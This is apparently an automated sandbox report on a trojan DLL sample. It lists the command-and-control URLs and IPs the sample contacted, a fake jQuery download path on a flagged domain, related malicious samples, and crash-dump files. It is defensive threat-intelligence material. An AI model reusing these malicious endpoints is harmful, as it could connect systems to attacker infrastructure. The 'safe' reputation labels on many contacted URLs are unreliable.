                                http://mohsinkhanfoundation.com/pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                unknown
                                mohsinkhanfoundation.com/pcQLeLMburtrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                unknown
                                hoteloaktree.com/QthLWsZsVgbtrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                unknown
                                111true
                                • Avira URL Cloud: safe
                                low
                                http://lendbiz.vn/xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV9true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                unknown
                                tuxsecuritybiness.comtrue
                                • Avira URL Cloud: malware
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                unknown
                                nuevainfotech.com/xCNyTjzkoetrue
                                • Avira URL Cloud: safe
                                low
                                aterwellnessinc.com/U7D0sswwptrue
                                • Avira URL Cloud: safe
                                low
                                geosever.rs/ObHP1CHttrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                unknown
                                armordetailing.rs/lgfrZb4Re6WOtrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/H0N6dX1le310YXlkfA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                unknown
                                erogholding.com/GFM1QcCFktrue
                                • Avira URL Cloud: safe
                                low
                                http://lendbiz.vn/xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                unknown
                                lendbiz.vn/xj3BhHtMbftrue
                                • Avira URL Cloud: safe
                                low
                                http://sirifinco.com/Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA==false
                                • Avira URL Cloud: safe
                                unknown
                                http://sirifinco.com/Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA==false
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                unknown
                                lefrenchwineclub.com/eRUGdDoxtrue
                                • Avira URL Cloud: safe
                                low
                                acdlimited.com/2u6aW9Pfetrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                unknown
                                ordpress17.com/5WG6Z62sKWotrue
                                • Avira URL Cloud: safe
                                low
                                jornaldasoficinas.com/ZF8GKIGVDupLtrue
                                • Avira URL Cloud: safe
                                low
                                sirifinco.com/Urbhq9wO50jtrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://lendbiz.vn/xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                unknown
                                sjgrand.lk/zvMYuQqEZjtrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://lendbiz.vn/xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                unknown
                                http://lendbiz.vn/xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                unknown
                                http://lendbiz.vn/xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                unknown
                                orldofjain.com/lMsTA7tSYpetrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                unknown
                                dadabhoy.pk/m6rQE94Utrue
                                • Avira URL Cloud: safe
                                low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                unknown
                                altayaralsudani.net/SSUsPgb7PHgCtrue
                                • Avira URL Cloud: safe
                                low
                                http://23.82.140.206/jquery-3.3.1.slim.min.jstrue
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ==true
                                • Avira URL Cloud: safe
                                unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://code.jquery.com/loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000002.519163002.0000000003760000.00000004.00000040.sdmpfalse
                                  high
                                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfwloaddll32.exe, 00000000.00000003.311329972.0000000003605000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsloaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.357019934.00000000035FD000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.324864290.0000000003605000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://ctldl.winIloaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://tuxsecuritybiness.com:8080/loaddll32.exe, 00000000.00000002.519109976.0000000003669000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://r3.i.lencr.org/0loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://r3.i.lencr.org/C8408FE5CA4467EE4DA84A76EF238FE3.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.comloaddll32.exe, 00000000.00000003.286730458.0000000000AB8000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://x1.c.lencr.org/0loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://x1.i.lencr.org/0loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://r3.o.lencr.org0loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://code.jquery.com/1loaddll32.exe, 00000000.00000003.265875146.0000000003605000.00000004.00000001.sdmpfalse
                                    high
                                    https://tuxsecuritybiness.com/vloaddll32.exe, 00000000.00000003.266948088.0000000000AB8000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://cps.letsencrypt.org0loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://23.82.140.206:8080/mpersonationloaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://tuxsecuritybiness.com/loaddll32.exe, 00000000.00000003.328522826.0000000000AB8000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://23.82.140.206:8080/loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVwloaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    107.180.44.125
                                    mohsinkhanfoundation.comUnited States
                                    26496AS-26496-GO-DADDY-COM-LLCUStrue
                                    185.67.1.94
                                    hoteloaktree.comUkraine
                                    196645HOSTPRO-ASUAtrue
                                    162.215.253.14
                                    sirifinco.comUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUStrue
                                    23.82.140.206
                                    unknownUnited States
                                    393886LEASEWEB-USA-MIA-11UStrue
                                    103.28.36.212
                                    lendbiz.vnViet Nam
                                    131353NHANHOA-AS-VNNhanHoaSoftwarecompanyVNtrue

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:491706
                                    Start date:27.09.2021
                                    Start time:20:24:46
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:p2SijKiqgZ.dll
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:26
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winDLL@6/10@207/6
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 67.6% (good quality ratio 65.9%)
                                    • Quality average: 76.4%
                                    • Quality standard deviation: 25.5%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .dll
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • HTTP Packets have been reduced
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22, 52.168.117.173, 2.22.153.126, 23.0.174.185, 23.0.174.200, 95.100.54.203, 20.50.102.62, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.210.154
                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, e8652.dscx.akamaiedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    20:25:45API Interceptor300x Sleep call for process: loaddll32.exe modified
                                    20:25:58API Interceptor1x Sleep call for process: WerFault.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    185.67.1.94OUTSTANDING_INV_Statement_937931.xlsGet hashmaliciousBrowse
                                      162.215.253.1455scan payment copy.exeGet hashmaliciousBrowse
                                      • www.songsupdate.online/ug3/?6l=nbJIqvPCw7utp3ZpXYf6101lpxScChc3+8n/s68KKzIix+M6aCovxW/fnZRgzJR0dVOT5IrEbujXi0Z6&1b_=e078ibQ8THfXJ2yp
                                      23.82.140.206waff.xlsGet hashmaliciousBrowse
                                        103.28.36.212https://kbelectricals.co.in/varujy3/ox07-svj-94Get hashmaliciousBrowse

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          AS-26496-GO-DADDY-COM-LLCUSInquiry-URGENT.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          ejecutable1.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          RFQ9003930 New Order.docGet hashmaliciousBrowse
                                          • 166.62.10.138
                                          MOQ-Request_0927210-006452.xlsxGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          DHL EXPRESS TESL#U0130MAT B#U0130LD#U0130R#U0130M#U0130 - AWB 9420174470.PDF.exeGet hashmaliciousBrowse
                                          • 148.72.246.52
                                          fmS6YYhBy1Get hashmaliciousBrowse
                                          • 148.72.252.161
                                          L3Gl0GugHoGet hashmaliciousBrowse
                                          • 208.109.110.202
                                          test1.dllGet hashmaliciousBrowse
                                          • 148.66.136.190
                                          qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                          • 148.72.53.144
                                          qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                          • 148.72.53.144
                                          NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          cash payment.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          Swift_6408372.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          RFQ-847393.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          IX-08955.exeGet hashmaliciousBrowse
                                          • 166.62.10.136
                                          jKira.arm7Get hashmaliciousBrowse
                                          • 68.178.219.153
                                          HSBC94302,pdf.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          MOIUQ4354.vbsGet hashmaliciousBrowse
                                          • 107.180.72.43
                                          JIQKI7073.vbsGet hashmaliciousBrowse
                                          • 107.180.72.43
                                          Quotation -Scan001_No- 9300340731.doc.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          HOSTPRO-ASUA1wKONPeBx1.exeGet hashmaliciousBrowse
                                          • 185.67.3.52
                                          PURCHASE ORDER.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          Quote-TSL-1037174_4810.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          DENSCO QUOTE.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          MESCO TQZ24 QUOTE.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          TQZ23 DESCO MC.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          TQZ23 DESCO MC.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          DENSCO QUOTE.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          4Vy2EGhzNF.exeGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          2020tb3005.doc__.rtfGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          $RAULIU9.exeGet hashmaliciousBrowse
                                          • 91.239.233.22
                                          OUTSTANDING_INV_Statement_937931.xlsGet hashmaliciousBrowse
                                          • 185.67.1.94
                                          866-0001E ORDER AND SHIP.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          866-0001E ORDER AND SHIP.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          new order list.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          nX5xMoS3Pn.exeGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          tryb.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          Order Specification.exeGet hashmaliciousBrowse
                                          • 185.156.42.252
                                          rib.exeGet hashmaliciousBrowse
                                          • 91.239.233.22
                                          https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.htmlGet hashmaliciousBrowse
                                          • 91.239.235.5

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_93501137f7dee44608c963aa617a61e5ad25b8_82810a17_1bc2b2b4\Report.wer
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):12696
                                          Entropy (8bit):3.772558537541242
                                          Encrypted:false
                                          SSDEEP:192:PPiq0oXMHBUZMX4jed+Q/3iz/u7slS274ItWct:3i8XUBUZMX4je1w/u7slX4ItWct
                                          MD5:82C0D98D380460FA0A33B1F104F87E60
                                          SHA1:9C59D1CEEDB0CEA50025E1DEFF53000C425BDB19
                                          SHA-256:F2FC9492148068F4202C497D7DB8DFA6D7864DF7CE2EF9223C097068B1D5C964
                                          SHA-512:6C3E2260C6DE9A60CD3FC5A347E26314A6741CF283D0933394EF3544ADCB26D1ED25E2C222AC194D01A74324401874CCDBCCB6588D3138AC28A0580B3965A8D3
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.7.3.1.5.0.5.9.4.5.5.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.7.3.1.5.7.0.4.7.6.4.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.f.d.e.b.a.6.-.8.6.d.4.-.4.2.3.4.-.a.e.b.2.-.f.5.9.c.0.0.2.8.b.a.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.a.b.4.4.a.2.-.2.0.2.9.-.4.5.2.7.-.8.2.b.3.-.b.3.7.5.d.1.a.4.a.4.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.0.-.0.0.0.1.-.0.0.1.7.-.f.f.e.a.-.5.1.8.5.1.8.b.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER920C.tmp.dmp
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Tue Sep 28 03:25:52 2021, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):47174
                                          Entropy (8bit):2.1285698716091583
                                          Encrypted:false
                                          SSDEEP:192:eBMDuCZlbO159VxXbT/H8CBpq1WGUQMU8SvXnz4mxAW6QXuSnBLi:3/O159VxcmsPUjU8SvXn1xAYXY
                                          MD5:635AC1CD937C4ED884BD1597EE7BB19D
                                          SHA1:F411D609B2429B882A90022E40D47E7D11BFC675
                                          SHA-256:4F90BA2058C3751B13E86B58E36254C9099E998A973BBD1F94DFEE1AC251D9A3
                                          SHA-512:F9438D5CC0D40F4554D02E60D11D35B02B24BA1C429191D878B0FCE4D8273A5CB3BE65D58A7E8157829F552FF17F5A1D770FC933E02A3B5C9B122FEE4122564B
                                          Malicious:false
                                          Reputation:low
                                          Preview: MDMP....... .......@.Ra...................U...........B....... ......GenuineIntelW...........T....... ...7.Ra.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B45.tmp.WERInternalMetadata.xml
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8302
                                          Entropy (8bit):3.7004219106901513
                                          Encrypted:false
                                          SSDEEP:192:Rrl7r3GLNi9N6x6Yr+6fgmfTKS0Cprs89bqYsfGOm:RrlsNiH6x6Yy6fgmfTKSFqLf2
                                          MD5:B0C60ADA7ACC84BB76A937BD6E462BE9
                                          SHA1:AE976DC28574E4C6289F5DCE7D01F247D19325BA
                                          SHA-256:3F490F43C57126B74C38E209409B054AC062BA3571987F7016D1070EFB3C326A
                                          SHA-512:60D9F363AAFEC9226F09B75588ABE97886ABCAE2840ADC2E4DB041364637A29FDC604BA3EAC4E509DE323CDF1114C70FA20C2991C8EB87EE4221AE167B2BE84E
                                          Malicious:false
                                          Reputation:low
